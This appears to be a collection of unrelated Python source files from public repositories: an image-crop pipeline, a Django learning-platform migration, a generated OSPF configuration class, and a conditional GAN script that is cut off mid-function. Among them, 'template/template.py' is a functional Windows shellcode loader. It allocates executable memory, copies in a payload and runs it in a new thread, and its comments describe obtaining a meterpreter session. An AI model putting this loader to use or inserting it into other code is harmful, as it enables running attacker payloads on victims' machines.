or len(bd_ratio_range) != 2):
            raise TypeError('bd_ratio_range must be a tuple of 2 floats, '
                            f'but got {bd_ratio_range}')
self.keys = keys
self.bd_ratio_range = bd_ratio_range
self.test_mode = test_mode
def __call__(self, results):
"""Call function.
Args:
results (dict): A dict containing the necessary information and
data for augmentation.
Returns:
dict: A dict containing the processed data and information.
"""
seg = results['seg']
height, width = seg.shape[:2]
# get foreground bbox
fg_coor = np.array(np.where(seg))
top, left = np.amin(fg_coor, axis=1)
bottom, right = np.amax(fg_coor, axis=1)
# enlarge bbox
long_side = np.maximum(bottom - top, right - left)
if self.test_mode:
bottom = top + long_side
right = left + long_side
boundary_ratio = np.random.uniform(*self.bd_ratio_range)
boundary = int(np.round(boundary_ratio * long_side))
# NOTE: Different from the original repo, we keep track of the four
# corners of the bbox (left, top, right, bottom) while the original
# repo use (top, left, height, width) to represent bbox. This may
        # introduce a difference of 1 pixel.
top = max(top - boundary, 0)
left = max(left - boundary, 0)
bottom = min(bottom + boundary, height)
right = min(right + boundary, width)
for key in self.keys:
results[key] = results[key][top:bottom, left:right]
results['crop_bbox'] = (left, top, right, bottom)
return results
@PIPELINES.register_module()
class ModCrop:
"""Mod crop gt images, used during testing.
Required keys are "scale" and "gt",
added or modified keys are "gt".
"""
def __call__(self, results):
"""Call function.
Args:
results (dict): A dict containing the necessary information and
data for augmentation.
Returns:
dict: A dict containing the processed data and information.
"""
img = results['gt'].copy()
scale = results['scale']
if img.ndim in [2, 3]:
h, w = img.shape[0], img.shape[1]
h_remainder, w_remainder = h % scale, w % scale
img = img[:h - h_remainder, :w - w_remainder, ...]
else:
raise ValueError(f'Wrong img ndim: {img.ndim}.')
results['gt'] = img
return results
@PIPELINES.register_module()
class CropLike:
"""Crop/pad the image in the target_key according to the size of image
    in the reference_key.
Args:
target_key (str): The key needs to be cropped.
reference_key (str | None): The reference key, need its size.
Default: None.
"""
def __init__(self, target_key, reference_key=None):
assert reference_key and target_key
self.target_key = target_key
self.reference_key = reference_key
def __call__(self, results):
"""Call function.
Args:
results (dict): A dict containing the necessary information and
data for augmentation.
Require self.target_key and self.reference_key.
Returns:
dict: A dict containing the processed data and information.
Modify self.target_key.
"""
size = results[self.reference_key].shape
old_image = results[self.target_key]
old_size = old_image.shape
h, w = old_size[:2]
new_size = size[:2] + old_size[2:]
h_cover, w_cover = min(h, size[0]), min(w, size[1])
format_image = np.zeros(new_size, dtype=old_image.dtype)
format_image[:h_cover, :w_cover] = old_image[:h_cover, :w_cover]
results[self.target_key] = format_image
return results
def __repr__(self):
return (self.__class__.__name__ + f' target_key={self.target_key}, ' +
f'reference_key={self.reference_key}')
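def _demo_crop_like():
    """Minimal standalone sketch (illustration only) of the crop/pad behaviour
    of ``CropLike`` above: the target array is copied into a zero array whose
    spatial size matches the reference, so it is cropped where larger and
    zero-padded where smaller. The 4x6 and 5x5 shapes are assumed values.
    """
    import numpy as np
    reference = np.zeros((4, 6, 3))
    target = np.ones((5, 5, 3))
    new_size = reference.shape[:2] + target.shape[2:]
    h_cover = min(target.shape[0], reference.shape[0])
    w_cover = min(target.shape[1], reference.shape[1])
    out = np.zeros(new_size, dtype=target.dtype)
    out[:h_cover, :w_cover] = target[:h_cover, :w_cover]
    return out.shape  # -> (4, 6, 3)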
| 37.718667
| 79
| 0.572413
|
b6d53abf6d7c153b38c23e0d0c79382d3138a8a9
| 13,609
|
py
|
Python
|
lms_app/migrations/0001_initial.py
|
neethu-niya/sbr
|
cdae2000e718ccc6fca948d241f29acb2d2b388d
|
[
"MIT"
] | null | null | null |
lms_app/migrations/0001_initial.py
|
neethu-niya/sbr
|
cdae2000e718ccc6fca948d241f29acb2d2b388d
|
[
"MIT"
] | null | null | null |
lms_app/migrations/0001_initial.py
|
neethu-niya/sbr
|
cdae2000e718ccc6fca948d241f29acb2d2b388d
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0 on 2020-12-11 10:25
import autoslug.fields
from django.db import migrations, models
import django.db.models.deletion
import phonenumber_field.modelfields
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Chapter',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('slug', autoslug.fields.AutoSlugField(editable=False, null=True, populate_from='name')),
('active', models.BooleanField(default=False)),
('free_tier', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
options={
'verbose_name': 'Chapter',
'verbose_name_plural': 'Chapters',
},
),
migrations.CreateModel(
name='Chat',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(blank=True, null=True, upload_to='staticfiles/image/')),
('pdf', models.FileField(upload_to='staticfiles/pdf')),
('remark', models.CharField(max_length=200)),
('uploaded_by', models.CharField(choices=[('0', 'Admin'), ('1', 'Teacher'), ('2', 'Student')], max_length=255)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField(null=True)),
('created', models.DateTimeField(auto_now_add=True)),
('approved_comment', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='Documents',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('subtitle', models.CharField(max_length=255)),
('description', models.TextField(blank=True, null=True)),
('url_field', models.URLField(blank=True, null=True)),
('image', models.ImageField(blank=True, null=True, upload_to='staticfiles/image/')),
('thumbnail_image', models.ImageField(blank=True, null=True, upload_to='staticfiles/thumbnail/')),
('pdf', models.FileField(upload_to='staticfiles/pdf')),
('active', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
options={
'verbose_name': 'Document',
'verbose_name_plural': 'Documents',
},
),
migrations.CreateModel(
name='File',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(blank=True, null=True, upload_to='staticfiles/image/')),
('pdf', models.FileField(upload_to='staticfiles/pdf')),
('remark', models.CharField(max_length=200)),
('uploaded_by', models.CharField(choices=[('0', 'Admin'), ('1', 'Teacher'), ('2', 'Student')], max_length=255)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Notification',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255)),
('image', models.ImageField(blank=True, null=True, upload_to='staticfiles/image/')),
('description', models.TextField()),
('send_to', models.CharField(choices=[('Teacher', 'Teachers'), ('Student', 'Students')], max_length=255)),
('active', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(blank=True, null=True, upload_to='staticfiles/image/')),
],
),
migrations.CreateModel(
name='Question_paper',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('subtitle', models.CharField(max_length=255)),
('description', models.TextField(blank=True, null=True)),
('url_field', models.URLField(blank=True, null=True)),
('image', models.ImageField(blank=True, null=True, upload_to='staticfiles/image/')),
('thumbnail_image', models.ImageField(blank=True, null=True, upload_to='staticfiles/thumbnail/')),
('pdf', models.FileField(upload_to='staticfiles/pdf')),
('active', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
options={
'verbose_name': 'Question_paper',
'verbose_name_plural': 'Question_papers',
},
),
migrations.CreateModel(
name='Scheme',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('slug', autoslug.fields.AutoSlugField(editable=False, null=True, populate_from='name')),
('active', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Standard',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('active', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Student',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('address', models.CharField(blank=True, max_length=255, null=True)),
('city', models.CharField(blank=True, max_length=255, null=True)),
('district', models.CharField(blank=True, max_length=255, null=True)),
('email', models.EmailField(blank=True, max_length=254, null=True)),
('image', models.ImageField(blank=True, null=True, upload_to='staticfiles/image/')),
('guardian_name', models.CharField(blank=True, max_length=255, null=True)),
('guardian_relation', models.CharField(blank=True, max_length=50, null=True)),
('contact_no', phonenumber_field.modelfields.PhoneNumberField(blank=True, default=None, max_length=128, null=True, region=None, unique=True)),
('whatsapp_no', phonenumber_field.modelfields.PhoneNumberField(blank=True, default=None, max_length=128, null=True, region=None, unique=True)),
('course_type', models.CharField(blank=True, max_length=255, null=True)),
('is_paid', models.BooleanField(default=False)),
('active', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Study_Material',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('subtitle', models.CharField(max_length=255)),
('description', models.TextField(blank=True, null=True)),
('url_field', models.URLField(blank=True, null=True)),
('image', models.ImageField(blank=True, null=True, upload_to='staticfiles/image/')),
('thumbnail_image', models.ImageField(blank=True, null=True, upload_to='staticfiles/thumbnail/')),
('pdf', models.FileField(upload_to='staticfiles/pdf')),
('active', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
options={
'verbose_name': 'Study_Material',
'verbose_name_plural': 'Study_Materials',
},
),
migrations.CreateModel(
name='Subject',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('slug', autoslug.fields.AutoSlugField(editable=False, populate_from='name')),
('active', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Syllabus',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('active', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
options={
'verbose_name': 'Syllabus',
'verbose_name_plural': 'Syllabus',
},
),
migrations.CreateModel(
name='Video',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('subtitle', models.CharField(blank=True, max_length=255, null=True)),
('description', models.TextField()),
('videofile', models.FileField(null=True, upload_to='staticfiles/media_root/videos/')),
('image', models.ImageField(blank=True, null=True, upload_to='staticfiles/image/')),
('thumbnail_image', models.ImageField(blank=True, null=True, upload_to='staticfiles/thumbnail/')),
('url_field', models.URLField(blank=True, null=True)),
('active', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('chapter', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='lms_app.Chapter')),
('subject', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='lms_app.Subject')),
],
),
migrations.CreateModel(
name='Teacher',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('email', models.EmailField(blank=True, max_length=254, null=True)),
('contact_no_1', phonenumber_field.modelfields.PhoneNumberField(blank=True, default=None, max_length=128, null=True, region=None, unique=True)),
('whatsapp_no', phonenumber_field.modelfields.PhoneNumberField(blank=True, default=None, max_length=128, null=True, region=None, unique=True)),
('address', models.CharField(max_length=255)),
('image', models.ImageField(blank=True, null=True, upload_to='staticfiles/image/')),
('gender', models.CharField(choices=[('0', 'Male'), ('1', 'Female')], max_length=6, null=True)),
('active', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('subject', models.ManyToManyField(blank=True, to='lms_app.Subject')),
],
),
]
| 55.097166
| 160
| 0.571754
|
9df9e5e190eefc7158034bd5de3cc58878918fa3
| 9,797
|
py
|
Python
|
pybind/slxos/v17r_2_00/routing_system/ipv6/router/ospf/area/virtual_link/link_properties/authentication/__init__.py
|
extremenetworks/pybind
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v17r_2_00/routing_system/ipv6/router/ospf/area/virtual_link/link_properties/authentication/__init__.py
|
extremenetworks/pybind
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v17r_2_00/routing_system/ipv6/router/ospf/area/virtual_link/link_properties/authentication/__init__.py
|
extremenetworks/pybind
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
[
"Apache-2.0"
] | 1
|
2021-11-05T22:15:42.000Z
|
2021-11-05T22:15:42.000Z
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import ipsec_auth_key_config
class authentication(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-common-def - based on the path /routing-system/ipv6/router/ospf/area/virtual-link/link-properties/authentication. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Authentication of OSPF messages
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__key_chain','__ipsec_auth_key_config',)
_yang_name = 'authentication'
_rest_name = 'authentication'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__key_chain = YANGDynClass(base=unicode, default=unicode(""), is_leaf=True, yang_name="key-chain", rest_name="key-chain", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Key Chain reference'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='string', is_config=True)
self.__ipsec_auth_key_config = YANGDynClass(base=ipsec_auth_key_config.ipsec_auth_key_config, is_container='container', presence=False, yang_name="ipsec-auth-key-config", rest_name="", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'cli-drop-node-name': None, u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'routing-system', u'ipv6', u'router', u'ospf', u'area', u'virtual-link', u'link-properties', u'authentication']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'ipv6', u'router', u'ospf', u'area', u'virtual-link', u'authentication']
def _get_key_chain(self):
"""
Getter method for key_chain, mapped from YANG variable /routing_system/ipv6/router/ospf/area/virtual_link/link_properties/authentication/key_chain (string)
"""
return self.__key_chain
def _set_key_chain(self, v, load=False):
"""
Setter method for key_chain, mapped from YANG variable /routing_system/ipv6/router/ospf/area/virtual_link/link_properties/authentication/key_chain (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_key_chain is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_key_chain() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, default=unicode(""), is_leaf=True, yang_name="key-chain", rest_name="key-chain", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Key Chain reference'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """key_chain must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, default=unicode(""), is_leaf=True, yang_name="key-chain", rest_name="key-chain", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Key Chain reference'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='string', is_config=True)""",
})
self.__key_chain = t
if hasattr(self, '_set'):
self._set()
def _unset_key_chain(self):
self.__key_chain = YANGDynClass(base=unicode, default=unicode(""), is_leaf=True, yang_name="key-chain", rest_name="key-chain", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Key Chain reference'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='string', is_config=True)
def _get_ipsec_auth_key_config(self):
"""
Getter method for ipsec_auth_key_config, mapped from YANG variable /routing_system/ipv6/router/ospf/area/virtual_link/link_properties/authentication/ipsec_auth_key_config (container)
"""
return self.__ipsec_auth_key_config
def _set_ipsec_auth_key_config(self, v, load=False):
"""
Setter method for ipsec_auth_key_config, mapped from YANG variable /routing_system/ipv6/router/ospf/area/virtual_link/link_properties/authentication/ipsec_auth_key_config (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_ipsec_auth_key_config is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ipsec_auth_key_config() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=ipsec_auth_key_config.ipsec_auth_key_config, is_container='container', presence=False, yang_name="ipsec-auth-key-config", rest_name="", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'cli-drop-node-name': None, u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ipsec_auth_key_config must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=ipsec_auth_key_config.ipsec_auth_key_config, is_container='container', presence=False, yang_name="ipsec-auth-key-config", rest_name="", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'cli-drop-node-name': None, u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)""",
})
self.__ipsec_auth_key_config = t
if hasattr(self, '_set'):
self._set()
def _unset_ipsec_auth_key_config(self):
self.__ipsec_auth_key_config = YANGDynClass(base=ipsec_auth_key_config.ipsec_auth_key_config, is_container='container', presence=False, yang_name="ipsec-auth-key-config", rest_name="", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'cli-drop-node-name': None, u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)
key_chain = __builtin__.property(_get_key_chain, _set_key_chain)
ipsec_auth_key_config = __builtin__.property(_get_ipsec_auth_key_config, _set_ipsec_auth_key_config)
_pyangbind_elements = {'key_chain': key_chain, 'ipsec_auth_key_config': ipsec_auth_key_config, }
| 60.850932
| 587
| 0.735225
|
a399a1cd9511df8e144d282c66259aa07549a6d8
| 2,293
|
py
|
Python
|
template/template.py
|
axano/Metastasis-Framework
|
ff42bcd7e6c4463ff4cbf0d9baba348d0416ca16
|
[
"MIT"
] | 3
|
2020-05-03T13:05:08.000Z
|
2020-07-02T05:23:33.000Z
|
template/template.py
|
axano/Metastasis-Framework
|
ff42bcd7e6c4463ff4cbf0d9baba348d0416ca16
|
[
"MIT"
] | null | null | null |
template/template.py
|
axano/Metastasis-Framework
|
ff42bcd7e6c4463ff4cbf0d9baba348d0416ca16
|
[
"MIT"
] | 1
|
2020-07-02T02:36:04.000Z
|
2020-07-02T02:36:04.000Z
|
import ctypes
# ctypes makes it very simple to interact with the Windows API from a Python script, so it is a required import for this script. It provides C-compatible data types and allows calling functions in DLLs or shared libraries
shellcode = (
);
# Shellcode - This is the shellcode that will be copied into memory and then executed, granting an SSL-certified meterpreter session
# We will be using 4 Win32 APIs to execute the shellcode; these APIs are central to dynamic memory management on Windows platforms
ptr = ctypes.windll.kernel32.VirtualAlloc(0,4096,ctypes.c_int(0x1000),ctypes.c_int(0x40))
# First, VirtualAlloc() allocates a new executable memory region (0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE); the shellcode will be copied into it and then executed
b = bytearray() # Use a bytearray() so the shellcode string is converted into a mutable byte buffer under Python 3 rather than left as text
b.extend(map(ord, shellcode))
buf = (ctypes.c_char * len(shellcode)).from_buffer(b)
# Construct a ctypes char array the size of our shellcode, backed by the byte buffer
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
# RtlMoveMemory() accepts 3 arguments: a pointer to the destination (returned by VirtualAlloc()), a pointer to the memory to be copied, and the number of bytes to copy, in our case the size of the shellcode
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
# CreateThread() accepts 6 arguments; in our case the third argument is the important one: a pointer to the application-defined code to be executed by the thread (the address returned by VirtualAlloc()). If the function succeeds, the return value is a handle to the new thread.
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
# WaitForSingleObject() accepts 2 arguments: the handle to the object (returned by CreateThread()) and the time-out interval in milliseconds (-1 waits indefinitely, keeping the process alive while the thread runs)
| 88.192308
| 277
| 0.69167
|
671a2a7a05811b8fddca5dc1bcc9bbd78e0c5f10
| 8,649
|
py
|
Python
|
experiments/image_generation/gans/cgan.py
|
habout632/gans
|
5a1f8859d81c3f0356b9b23901ed515d04309268
|
[
"MIT"
] | null | null | null |
experiments/image_generation/gans/cgan.py
|
habout632/gans
|
5a1f8859d81c3f0356b9b23901ed515d04309268
|
[
"MIT"
] | null | null | null |
experiments/image_generation/gans/cgan.py
|
habout632/gans
|
5a1f8859d81c3f0356b9b23901ed515d04309268
|
[
"MIT"
] | null | null | null |
import os
import torch
from torch import nn, optim
from torch.autograd.variable import Variable
from torchvision import transforms, datasets
from experiments.image_generation.utils import Logger
# mnist data
# def mnist_data():
# , transforms.Normalize((.5, .5, .5), (.5,.5,.5))
compose = transforms.Compose([transforms.ToTensor()])
out_dir = './dataset'
data = datasets.CIFAR10(root=out_dir, train=True, transform=compose, download=True)
# Load data
# data = mnist_data()
# Create loader with data, so that we can iterate over it
data_loader = torch.utils.data.DataLoader(data, batch_size=100, shuffle=True)
# Num batches
num_batches = len(data_loader)
# data_transform = transforms.Compose([
# # transforms.RandomResizedCrop(224),
# # transforms.RandomHorizontalFlip(),
# transforms.ToTensor(),
# # transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
# ])
# hymenoptera_dataset = datasets.ImageFolder(root='../dataset/extra_data', transform=data_transform)
# print(len(hymenoptera_dataset))
# data_loader = torch.utils.data.DataLoader(hymenoptera_dataset, batch_size=128, shuffle=True, num_workers=4)
# # Num batches
# num_batches = len(data_loader)
n_features = 3 * 64 * 64
n_channels = 3
width = 64
height = 64
n_out = 1
n_noise = 100
clip = 0.01
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
D_PATH = 'models/vgan/anime_d.pth'
G_PATH = 'models/vgan/anime_g.pth'
# custom weights initialization called on netG and netD
def weights_init(m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
nn.init.normal_(m.weight.data, 0.0, 0.02)
elif classname.find('BatchNorm') != -1:
nn.init.normal_(m.weight.data, 1.0, 0.02)
nn.init.constant_(m.bias.data, 0)
class DiscriminatorNet(nn.Module):
"""
A three hidden-layer discriminative neural network
"""
def __init__(self):
super(DiscriminatorNet, self).__init__()
# n_features = 784
# n_out = 1
self.hidden0 = nn.Sequential(
nn.Conv2d(3, 64, 3, stride=2, padding=1, ),
nn.LeakyReLU(0.2),
# nn.MaxPool2d(2, 2)
)
self.hidden1 = nn.Sequential(
nn.Conv2d(64, 128, 3, stride=2, padding=1),
nn.BatchNorm2d(128),
nn.LeakyReLU(0.2),
# nn.MaxPool2d(2, 2)
)
self.hidden2 = nn.Sequential(
nn.Conv2d(128, 256, 3, stride=2, padding=1),
nn.BatchNorm2d(256),
nn.LeakyReLU(0.2),
# nn.MaxPool2d(2, 2, ceil_mode=True)
)
# self.hidden3 = nn.Sequential(
# nn.Conv2d(256, 512, 3, stride=2, padding=1),
# nn.BatchNorm2d(512),
# nn.LeakyReLU(0.2),
# # nn.MaxPool2d(2, 2, ceil_mode=True)
# )
self.out = nn.Sequential(
# nn.Conv2d(256, 1, 4, padding=0),
nn.Linear(256 * 4 * 4 + 10, n_out),
# nn.Conv2d(512, 1, 5, stride=2, padding=1),
# nn.BatchNorm1d(n_out),
# in wgan, should not use sigmoid
nn.Sigmoid()
)
def forward(self, x, y):
"""
input 3*64*64
:param x:
:return:
"""
x = self.hidden0(x)
x = self.hidden1(x)
x = self.hidden2(x)
# x = self.hidden3(x)
x = x.view(-1, 256 * 4 * 4)
x = torch.cat((x, y), 1)
x = self.out(x)
return x
discriminator = DiscriminatorNet()
# # load model
# if os.path.isfile(D_PATH):
# discriminator.load_state_dict(torch.load(D_PATH))
discriminator.to(device)
discriminator.apply(weights_init)
def images_to_vectors(images):
return images.view(images.size(0), n_features)
def vectors_to_images(vectors):
return vectors.view(vectors.size(0), n_channels, width, height)
class GeneratorNet(nn.Module):
"""
A three hidden-layer generative neural network
"""
def __init__(self):
super(GeneratorNet, self).__init__()
# n_features = 100
# n_out = 784
# self.hidden0 = nn.Sequential(
# nn.Linear(n_noise, 4 * 4 * 1024),
# nn.BatchNorm1d(4 * 4 * 1024),
# nn.ReLU()
# )
self.hidden0 = nn.Sequential(
nn.ConvTranspose2d(110, 512, 4, 1, 0),
nn.BatchNorm2d(512),
nn.ReLU()
)
self.hidden1 = nn.Sequential(
nn.ConvTranspose2d(512, 256, 4, 2, 1),
nn.BatchNorm2d(256),
nn.ReLU()
)
self.hidden2 = nn.Sequential(
nn.ConvTranspose2d(256, 128, 4, 2, 1),
nn.BatchNorm2d(128),
nn.ReLU()
)
self.out = nn.Sequential(
nn.ConvTranspose2d(128, 3, 4, 2, 1),
# nn.BatchNorm2d(64),
nn.Tanh()
)
# self.out = nn.Sequential(
# nn.ConvTranspose2d(64, 3, 4, 2, 1),
# nn.Tanh()
# )
def forward(self, x):
x = x.view(-1, 110, 1, 1)
x = self.hidden0(x)
x = self.hidden1(x)
x = self.hidden2(x)
# x = self.hidden3(x)
x = self.out(x)
return x
generator = GeneratorNet()
#
# if os.path.isfile(G_PATH):
# generator.load_state_dict(torch.load(G_PATH))
generator.to(device)
generator.apply(weights_init)
def noise(size):
"""
Generates a 1-d vector of gaussian sampled random values
"""
# n = Variable(torch.randn(size, 100))
n = torch.randn((size, 100), requires_grad=True).to(device)
# n = torch.randn((size, 100, 1, 1), requires_grad=True).to(device)
# n = torch.randn((size, 100), requires_grad=True).to(device)
return n
d_optimizer = optim.RMSprop(discriminator.parameters(), lr=0.0002)
g_optimizer = optim.RMSprop(generator.parameters(), lr=0.0002)
def train_discriminator(optimizer, real_data, fake_data, y):
N = real_data.size(0)
# Reset gradients
optimizer.zero_grad()
# 1.1 Train on Real Data
prediction_real = discriminator(real_data, y)
# Calculate error and backpropagate
